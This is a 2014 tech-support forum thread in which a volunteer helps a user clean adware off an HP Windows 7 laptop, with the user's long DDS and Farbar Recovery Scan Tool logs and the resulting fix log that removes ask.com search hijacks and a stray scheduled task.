DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Home Premium 
Boot Device: \Device\HarddiskVolume1
Install Date: 5/7/2013 3:40:16 PM
System Uptime: 5/27/2014 4:16:13 PM (2 hours ago)
.
Motherboard: Hewlett-Packard | | 17F8
Processor: Intel(R) Core(TM) i5-2467M CPU @ 1.60GHz | CPU1 | 1601/1333mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 97 GiB total, 12.857 GiB free.
D: is FIXED (NTFS) - 18 GiB total, 1.939 GiB free.
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
No restore point in system.
.
==== Installed Programs ======================
.
Adobe Flash Player 13 ActiveX
Adobe Reader X (10.1.10) MUI
Adobe Shockwave Player 11.6
AuthenTec TrueAPI
Bejeweled 3
bjnplugin
Blackhawk Striker 2
Broadcom 802.11 Wireless LAN Adapter
Broadcom Bluetooth Software
Broadcom InConcert Maestro
CCleaner
Chuzzle Deluxe
Cradle of Rome 2
CyberLink YouCam
D3DX10
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition
Dora's World Adventure
Dropbox
DVRClientPlugin 1.3
EPSON Scan
ESU for Microsoft Windows 7 SP1
Evernote v. 4.2.3
Farm Frenzy
Farmscapes
FATE
Final Drive Fury
Fresco Logic USB3.0 Host Controller
Google Chrome
Google Toolbar for Internet Explorer
Google Update Helper
Hewlett-Packard ACLM.NET v1.2.1.1
Hightail for Outlook 3.1.0.2128
Hoyle Card Games
HP Auto
HP Client Services
HP CoolSense
HP Customer Experience Enhancements
HP Documentation
HP Games
HP Launch Box
HP On Screen Display
HP Power Manager
HP Quick Launch
HP Recovery Manager
HP Security Assistant
HP Setup
HP Setup Manager
HP SimplePass PE 2012
HP Software Framework
HP Support Assistant
IDT Audio
Intel(R) Control Center
Intel(R) Identity Protection Technology 1.1.2.0
Intel(R) Management Engine Components
Intel(R) Processor Graphics
Intel(R) Rapid Start Technology
Intel(R) Rapid Storage Technology
Java 7 Update 55
Java Auto Updater
Jewel Match 3
Jewel Quest Mysteries: The Seventh Gate Collector's Edition
John Deere Drive Green
Junk Mail filter update
Letters from Nowhere 2
Luxor HD
Mah Jong Medley
Mesh Runtime
Microsoft .NET Framework 4.5.1
Microsoft Application Error Reporting
Microsoft Office Access MUI (English) 2010
Microsoft Office Access Setup Metadata MUI (English) 2010
Microsoft Office Click-to-Run 2010
Microsoft Office Excel MUI (English) 2010
Microsoft Office Home and Business 2010
Microsoft Office Office 64-bit Components 2010
Microsoft Office OneNote MUI (English) 2010
Microsoft Office Outlook MUI (English) 2010
Microsoft Office PowerPoint MUI (English) 2010
Microsoft Office Proof (English) 2010
Microsoft Office Proof (French) 2010
Microsoft Office Proof (Spanish) 2010
Microsoft Office Proofing (English) 2010
Microsoft Office Publisher MUI (English) 2010
Microsoft Office Shared 64-bit MUI (English) 2010
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
Microsoft Office Shared MUI (English) 2010
Microsoft Office Shared Setup Metadata MUI (English) 2010
Microsoft Office Single Image 2010
Microsoft Office Word MUI (English) 2010
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
MSVCRT
MSVCRT_amd64
MyFreeCodec
Norton Internet Security
Norton Management
opensource
Penguins!
Plants vs. Zombies - Game of the Year
PlayReady PC Runtime x86
Poker Superstars III
Polar Bowler
Polar Golfer
Realtek Ethernet Controller Driver
Realtek PCIE Card Reader
RollerCoaster Tycoon 3: Platinum
Samsung Kies
Samsung Kies3
SAMSUNG USB Driver for Mobile Phones
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)
Security Update for Microsoft Excel 2010 (KB2826033) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553284) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2687423) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2810073) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2826023) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2826035) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2850016) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2878284) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2880971) 32-Bit Edition
Security Update for Microsoft Word 2010 (KB2863926) 32-Bit Edition
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition
Skype Click to Call
Skype 6.14
SMART BRO
swMSM
Synaptics ClickPad Driver
The Treasures of Mystery Island: The Ghost Ship
Torchlight
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition
Update for Microsoft Office 2010 (KB2878225) 32-Bit Edition
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition
Update Installer for WildTangent Games App
VIP Access SDK (1.0.1.2) 
Virtual Villagers 4 - The Tree of Life
VLC media player 2.1.3
VpnOneClick
WildTangent Games App (HP Games)
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Language Selector
Windows Live Mail
Windows Live Mesh
Windows Live Mesh ActiveX Control for Remote Connections
Windows Live Messenger
Windows Live MIME IFilter
Windows Live Movie Maker
Windows Live Photo Common
Windows Live Photo Gallery
Windows Live PIMT Platform
Windows Live Remote Client
Windows Live Remote Client Resources
Windows Live Remote Service
Windows Live Remote Service Resources
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
WinZip 18.0
Yahoo! Messenger
Yahoo! Software Update
Yahoo! Toolbar
YouSendIt Plug-In for Outlook
Zuma's Revenge
.
==== Event Viewer Messages From Past Week ========
.
5/27/2014 5:26:38 PM, Error: Server [2505] - The server could not bind to the transport \Device\NetBT_Tcpip_{CA672D26-BFD4-4F50-B6AA-5D51B350F8A1} because another computer on the network has the same name. The server could not start.
5/27/2014 4:16:24 PM, Error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: cdrom
5/27/2014 4:14:25 PM, Error: volsnap [36] - The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.
.
==== End Of File ===========================


----------



## raphael100 (May 24, 2014)

Hi. I have now copied all the scan files required. However I cannot run GMER. It opens and begins to scan, then reports an error and Windows closes it.

Hope you can help. Many thanks!


----------



## raphael100 (May 24, 2014)

I have attached the required files above. My Internet Explorer seems to be affected - sends me to the wrong places. Also will not let me connect here. I am now going through Chrome to get here.


----------



## raphael100 (May 24, 2014)

Bumping up again.


----------



## raphael100 (May 24, 2014)

although my Internet Explorer has become nonfunctional - I can use Chrome. (The previous note on malicious re-direction is not correct ... my bank just happened to change its log in page. Gave me a scare)


----------



## raphael100 (May 24, 2014)

I have now attached the required HijackThis file.


----------



## raphael100 (May 24, 2014)

Bump ... Please


----------



## emeraldnzl (Nov 3, 2007)

Hello raphael100,

Download the attached *fixlist.txt* file and save it to the Desktop.

*NOTE.* It's important that both files, *FRST* and *fixlist.txt *are in the same location or the fix will not work.

*NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system*

Run *FRST/FRST64* and press the *Fix* button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

*Next*

You should change your home page and search engines:

Go to the link below for instructions on how to change you homepage in Chrome.

http://support.google.com/chrome/bin/answer.py?hl=en&answer=95314

Go to the link below for instructions on how to change your default search engine in Chrome

https://support.google.com/chrome/answer/95426?hl=en

Changing your home page in Chrome will not be enough. You also have to clean cache and cookies.

Go to the link below and follow the instructions on how to delete cache and cookies:

https://support.google.com/chrome/answer/95582?hl=en

*After that*


Please run Farbars Recovery Scan Tool again
Press *Scan* button.
It will make a log (*FRST.txt*) in the same directory the tool is run. Please copy and paste it to your reply.
So when you return please post
Fixlog.txt
FRST.txt


----------



## raphael100 (May 24, 2014)

Thanks so much! Herewith the Fixlog:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 01-06-2014
Ran by Hewlett Packard at 2014-06-01 16:52:47 Run:1
Running from C:\Users\Hewlett Packard\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
SearchScopes: HKLM-x32 - {a0892e19-6051-4ae6-9a5f-91542a166b2b} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^BBQ^xdm039^YYA^ph&si=D2DPH&ptb=F3A8AB28-EF6C-4986-A25E-13ECC248CEF7&ind=2014031220&n=780bad74&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - DefaultScope {EE2E3455-3D76-49F0-BDFA-03732ABBFCFF} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {a0892e19-6051-4ae6-9a5f-91542a166b2b} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^BBQ^xdm039^YYA^ph&si=D2DPH&ptb=F3A8AB28-EF6C-4986-A25E-13ECC248CEF7&ind=2014031220&n=780bad74&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - {EE2E3455-3D76-49F0-BDFA-03732ABBFCFF} URL = https://www.google.com/search?q={searchTerms}
BHO-x32: No Name - {9e28b297-11d4-4293-aa6f-558658ee66ae} - No File
Toolbar: HKLM-x32 - No Name - {665cb5b7-4c3b-4995-8cec-1f4d5860edc9} - No File
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\17.1.2\\npsitesafety.dll No File
C:\Windows\System32\Tasks\DTChk
C:\Users\Public\Util
Task: {72BA2474-1D02-4E42-8D7E-812D0F4E35B4} - \DTReg No Task File <==== ATTENTION
Task: {00D6719A-B2BC-4D31-8498-A765ADFBAC61} - System32\Tasks\DTChk => C:\Users\Public\Util\DTChk.exe [2014-05-20] (Search Results, LLC)
AlternateDataStreams: C:\3590F75ABA9E485486C100C1A9D4FF06Z...ZZ.ZZ....ZZZ:1

*****************

HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{a0892e19-6051-4ae6-9a5f-91542a166b2b} => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{a0892e19-6051-4ae6-9a5f-91542a166b2b} => Key not found.
HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value deleted successfully.
HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{a0892e19-6051-4ae6-9a5f-91542a166b2b} => Key not found.
HKCR\CLSID\{a0892e19-6051-4ae6-9a5f-91542a166b2b} => Key not found.
HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{EE2E3455-3D76-49F0-BDFA-03732ABBFCFF} => Key deleted successfully.
HKCR\CLSID\{EE2E3455-3D76-49F0-BDFA-03732ABBFCFF} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9e28b297-11d4-4293-aa6f-558658ee66ae} => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{9e28b297-11d4-4293-aa6f-558658ee66ae} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{665cb5b7-4c3b-4995-8cec-1f4d5860edc9} => Value deleted successfully.
HKCR\Wow6432Node\CLSID\{665cb5b7-4c3b-4995-8cec-1f4d5860edc9} => Key not found.
C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\17.1.2\\npsitesafety.dll not found.
C:\Windows\System32\Tasks\DTChk => Moved successfully.
C:\Users\Public\Util => Moved successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{72BA2474-1D02-4E42-8D7E-812D0F4E35B4} => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72BA2474-1D02-4E42-8D7E-812D0F4E35B4} => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DTReg => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{00D6719A-B2BC-4D31-8498-A765ADFBAC61} => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{00D6719A-B2BC-4D31-8498-A765ADFBAC61} => Key deleted successfully.
C:\Windows\System32\Tasks\DTChk not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DTChk => Key deleted successfully.
"C:\3590F75ABA9E485486C100C1A9D4FF06Z...ZZ.ZZ....ZZZ" => ":1" ADS not found.

==== End of Fixlog ====


----------



## raphael100 (May 24, 2014)

*Farbar Scan*

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 01-06-2014
Ran by Hewlett Packard (administrator) on HEWLETTPACKARD on 01-06-2014 17:11:23
Running from C:\Users\Hewlett Packard\Desktop
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(HP) C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel Corporation) C:\Windows\SysWOW64\irstrtsv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
() C:\Program Files (x86)\SMART BRO\AssistantServices.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Hightail, Inc.) C:\Program Files (x86)\Hightail Desktop App\Hightail.exe
() C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar1.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar2.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Dropbox, Inc.) C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Windows (R) Win 7 DDK provider) C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
() C:\Program Files (x86)\SMART BRO\UIExec.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Bravotelco ltd) C:\Users\Hewlett Packard\AppData\Local\Apps\2.0\6H4TABEW.PPE\YHKT4HWK.R2D\vpno..tion_56181aa6c611862f_0002.0003_9bcc0731d8f9f012\VpnOneClick.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Bravotelco ltd) C:\Users\Hewlett Packard\AppData\Local\Apps\2.0\6H4TABEW.PPE\YHKT4HWK.R2D\vpno..tion_56181aa6c611862f_0002.0003_9bcc0731d8f9f012\VpnOneClick.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
(HP) C:\Program Files (x86)\HP SimplePass 2012\TouchControl.exe
(HP) C:\Program Files (x86)\HP SimplePass 2012\BioMonitor.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

==================== Registry (Whitelisted) ==================

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1424896 2011-10-06] (IDT, Inc.)
HKLM\...\Run: [SetDefault] => C:\Program Files\Hewlett-Packard\HP LaunchBox\SetDefault.exe [43320 2011-10-01] (Hewlett-Packard Development Company, L.P.)
HKLM\...\Run: [Hightail Sync Agent] => C:\Program Files (x86)\Hightail Desktop App\Hightail.exe [7107640 2014-02-13] (Hightail, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-20] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1343904 2012-11-05] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [FLxHCIm64] => C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe [55536 2013-06-05] (Windows (R) Win 7 DDK provider)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [578944 2012-03-05] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [UIExec] => C:\Program Files (x86)\SMART BRO\UIExec.exe [156448 2012-05-11] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [311616 2014-04-23] (Samsung Electronics Co., Ltd.)
HKLM-x32\...\Run: [Buffalo RUNONCE] => C:\BUFFALO\DriveNavi_HD-PUSU3-WR\%SRC_FILE1% /mode:RUNONCE1
HKLM\...\RunOnce: [NCPluginUpdater] - "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" Update [21720 2014-05-27] (Hewlett-Packard)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6160152 2014-05-20] (Piriform Ltd)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [20922016 2014-02-10] (Skype Technologies S.A.)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [Messenger (Yahoo!)] => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [6595928 2012-05-25] (Yahoo! Inc.)
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.co.uk/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7&rlz=1I7MXGB_enID590
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.co.uk/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7&rlz=1I7MXGB_enID590
BHO: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
BHO: TrueSuite Website Log On - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\x64\IEBHO.dll (HP)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Skype add-on for Internet Explorer - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: TrueSuite Website Log On - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\IEBHO.dll (HP)
BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Skype Browser Helper - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: No Name - {cc28794a-99d4-4b1b-bccf-b065ce5f9feb} - No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
